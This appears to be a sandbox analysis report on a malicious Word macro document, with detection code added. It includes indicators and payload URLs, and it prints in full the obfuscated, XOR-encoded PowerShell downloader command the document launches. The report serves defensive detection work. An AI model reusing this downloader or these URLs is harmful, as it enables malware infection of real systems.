Analysis
max time kernel: 101s
max time network: 139s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01-06-2024 01:03
Behavioral task behavioral1
Sample: 88ed173a8d99d149c094ece725ca4971_JaffaCakes118.doc
Resource: win7-20240221-en
Behavioral task behavioral2
Sample: 88ed173a8d99d149c094ece725ca4971_JaffaCakes118.doc
Resource: win10v2004-20240426-en
The results below are from behavioral2 (win10v2004-20240426-en, the resource named in the Analysis header).
General
Target: 88ed173a8d99d149c094ece725ca4971_JaffaCakes118.doc
Size: 118KB
MD5: 88ed173a8d99d149c094ece725ca4971
SHA1: 2d7c8d947010f530eccb8a883c80a5f4986de57a
SHA256: 44dd32692d0e613a75553fa9bf43a0b9c16e9469c64c7a4e4d8bdfd003772746
SHA512: 46ea360ce809d5a29b8d4303cdc0d504889a1996017bfa55cce4de16bb82525bac0e5c4f133bf68ae5b1382b4cf75fec62a3727d1294f296957e01e35b2aa91c
SSDEEP: 1536:HW3KKCeLbBj1YW+agz6FCJJD76gWYXeVal7d+v:2ieLNM6FI97IJ
Malware Config
Extracted
https://trostel.eu/G0r8KdEtHu/
http://thecentralbaptist.com/pMI9u5l/
http://houselight.com.br/6ROEQfpdJJ/
http://rusys.lt/thbcIeIjA/
http://bunt.com/openx/www/spqRlLMl/
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 3496 | 1444 | PowersHeLL.exe | 83
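The parent/child pairing above (WINWORD.EXE starting a PowerShell host) is the signal a detection engineer would key on, together with the obfuscation idioms visible in this sample's command line. The Python below is an added example, not the sandbox's own signature logic: it runs those checks over a handful of constructed process-creation records, the first of which mirrors this report's process tree (command line shortened to the parts the rules inspect) and the others are benign controls.

```python
"""Added example: flag Office-spawned script hosts and the obfuscation idioms
seen in this report's PowersHeLL.exe command line. Not the sandbox's own code;
the event records below are constructed to mirror the report."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Expected spellings of the image name; anything else (PowersHeLL.exe) is a
# casing trick that defeats naive case-sensitive string matches.
CANONICAL = {"powershell.exe": {"powershell.exe", "PowerShell.exe", "POWERSHELL.EXE"}}

# Obfuscation idioms taken from the command line in this report.
OBF_MARKERS = {
    "comspec_indexing": re.compile(r"\$env:comspec\s*\[", re.I),          # $EnV:ComSPEc[4,15,25]
    "bxor_char_decode": re.compile(r"\[char\]\s*\(\s*\$_\s*-bxor", re.I),  # [chAr]( $_-bXoR"0x0a")
    "join_int_array": re.compile(r"-join\s*\(\s*\(\s*\d+\s*,", re.I),      # -JOIN ((46 , 80 , ...
}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def unusual_casing(image):
    """True when a known image name is spelled in a non-standard mix of cases."""
    name = basename(image)
    allowed = CANONICAL.get(name.lower())
    return allowed is not None and name not in allowed


def analyse_event(ev):
    """Return the list of findings for one process-creation event."""
    parent = basename(ev["parent_image"]).lower()
    child = basename(ev["image"]).lower()
    findings = []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append(f"office_parent_spawned_script_host:{parent}->{child}")
    if unusual_casing(ev["image"]):
        findings.append("unusual_image_casing")
    for marker, rx in OBF_MARKERS.items():
        if rx.search(ev["command_line"]):
            findings.append(marker)
    return findings


def triage(events):
    """Map pid -> findings for every event that produced at least one finding."""
    return {ev["pid"]: f for ev in events if (f := analyse_event(ev))}


# Constructed events. The first mirrors the report's process tree (command line
# truncated to the parts the rules look at); the others are benign controls.
EVENTS = [
    {"pid": 3496, "parent_pid": 1444,
     "parent_image": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exe",
     "command_line": "PowersHeLL . ( $EnV:ComSPEc[4,15,25]-JoiN'') ( -JOIN ((46 , 80 , 90 ,105 "
                     ') |% { [chAr]( $_-bXoR"0x0a")} ))'},
    {"pid": 5120, "parent_pid": 4000,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"pid": 6004, "parent_pid": 1444,
     "parent_image": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "command_line": r"C:\Windows\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for pid, findings in triage(EVENTS).items():
        print(pid, findings)
```

The parent/child rule alone fires on every macro that launches a script host; the casing and command-line markers are what separate a launcher like this one from an administrator's `-File backup.ps1`, so a rule that requires both is a reasonable high-confidence alert while the pairing on its own is a hunting lead.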
Blocklisted process makes network request (7 IoCs)
flow | pid | Process
24 | 3496 | PowersHeLL.exe
31 | 3496 | PowersHeLL.exe
33 | 3496 | PowersHeLL.exe
36 | 3496 | PowersHeLL.exe
37 | 3496 | PowersHeLL.exe
38 | 3496 | PowersHeLL.exe
42 | 3496 | PowersHeLL.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
pid | Process
1444 | WINWORD.EXE
1444 | WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | Process
3496 | PowersHeLL.exe
3496 | PowersHeLL.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
description | pid | Process
Token: SeDebugPrivilege | 3496 | PowersHeLL.exe

Suspicious use of SetWindowsHookEx (7 IoCs)
pid | Process
1444 | WINWORD.EXE (7 occurrences)

Suspicious use of WriteProcessMemory (2 IoCs)
description | pid | Process | procid_target
PID 1444 wrote to memory of 3496 | 1444 | WINWORD.EXE | 90
PID 1444 wrote to memory of 3496 | 1444 | WINWORD.EXE | 90
A parent writing into a child it has just created is normal process start-up behaviour; the signal in this row is that the writer is WINWORD.EXE and the target is the PowerShell host, not the write itself.
Processes

[1] C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (PID 1444)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\88ed173a8d99d149c094ece725ca4971_JaffaCakes118.doc" /o ""
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exe (PID 3496, child of PID 1444)
  Command line: PowersHeLL . ( $EnV:ComSPEc[4,15,25]-JoiN'') ( -JOIN ((46 , 80 , 90 ,105 , 107, 73,42, 55,42 , 100, 111,125, 39, 101,104, 96, 111, 105, 126,42 , 120 ,107,100 , 110, 101, 103, 49,46 , 92 ,72,93 ,95, 90 ,105 ,42 , 55, 42, 100 ,111 ,125,39 , 101, 104 ,96 ,111,105 ,126 ,42 , 89, 115 , 121 , 126,111, 103 , 36, 68,111 ,126 , 36 ,93, 111 , 104,73 ,102,99 ,111 , 100,126 ,49 , 46,102 ,103, 65, 94 , 95,42, 55 ,42 , 45 , 98,126 ,126,122 , 121,48, 37 , 37, 126,120,101 , 121, 126, 111,102, 36 ,111 ,127 ,37 ,77, 58 ,120, 50, 65 ,110 ,79,126, 66 ,127 , 37 ,74 ,98, 126, 126 , 122,48 , 37, 37, 126,98 , 111 , 105, 111,100,126,120, 107,102 , 104,107, 122,126,99 ,121 ,126 ,36, 105 , 101 ,103 ,37 , 122,71 ,67 , 51 ,127,63, 102, 37 ,74 ,98,126 ,126,122, 48 , 37 , 37 , 98, 101 ,127, 121, 111 , 102,99, 109, 98,126 ,36 , 105,101,103,36 , 104, 120, 37 ,60 ,88,69 ,79,91,108 ,122, 110 , 64,64,37 , 74, 98 , 126, 126 ,122,48, 37,37 ,120 , 127,121 , 115,121, 36 ,102, 126 , 37 , 126, 98,104,105 , 67,111,67, 96, 75, 37,74, 98 , 126,126,122 , 48 ,37,37,104 ,127 , 100 ,126 ,36, 105,101, 103,37, 101, 122,111,100,114 , 37,125, 125,125,37 , 121,122, 123 ,88, 102 ,70,71 , 102 ,37,45 , 36 , 89 ,122 ,102, 99,126 , 34 , 45,74, 45, 35 ,49,46 , 123 , 79 ,70 ,95 , 89,72 , 42, 55,42, 46,80,90, 105 ,107,73 , 36 ,100 , 111 , 114,126, 34,59, 38,42 , 60, 57,58 , 57 , 56, 63, 35,49,46 , 107 ,100,78,96 ,91, 110 ,42,55 , 42, 46, 111 ,100 , 124 ,48 , 126,111,103,122,42, 33, 42 , 45,86,45 ,42 , 33,42, 46 ,123 , 79, 70,95 ,89,72, 42, 33 , 42,45 ,36, 111,114 , 111, 45 , 49,108,101,120,111 ,107, 105, 98,34 ,46 ,95,123 ,66, 93, 75, 42 , 99, 100 , 42, 46, 102 , 103 ,65 ,94 ,95 , 35,113, 126 , 120,115,113,46, 92,72 ,93 , 95, 90 , 105,36, 78,101 ,125 ,100,102 ,101 ,107 ,110,76, 99 ,102 , 111 , 34, 46, 95,123, 66, 93, 75 , 36 ,94 ,101 , 89 , 126 , 120, 99,100,109 , 34 ,35 ,38 , 42 , 46, 107,100 ,78,96,91 , 110 ,35 , 49 ,89 , 126 ,107 , 120, 126,39, 90,120 , 101,105, 111 , 121 , 121,42,46 ,107 , 100,78,96 , 91 , 110, 49,104,120, 111,107 ,97 ,49 , 119 ,105,107 , 126 , 105 ,98, 113,125 , 120 ,99, 126 , 111 ,39, 98, 101 , 121,126,42, 46,85 ,36 , 79 , 114 , 105,111 ,122,126,99,101, 100 ,36, 71 ,111,121, 121,107,109,111 ,49 ,119 ,119 ) |% { [chAr]( $_-bXoR"0x0a")} ))
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 1KB
MD5: 3c4ceb697e5059e604573d753a2040cc
SHA1: 94e13fad2b9f4cfd0db8590f7dc08c8165449948
SHA256: b620f9331191c29b2d38539a89386f9285643569876483db4d596d08423b189d
SHA512: a7394328fbdfb94c980ecc319fd5750c76323421c8475bceb10f954179c64602381bb79beae3a876d5d3219fa54d213b042a43bd10cc45d9568324d6c337fde0

Filesize: 262KB
MD5: 51d32ee5bc7ab811041f799652d26e04
SHA1: 412193006aa3ef19e0a57e16acf86b830993024a
SHA256: 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512: 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82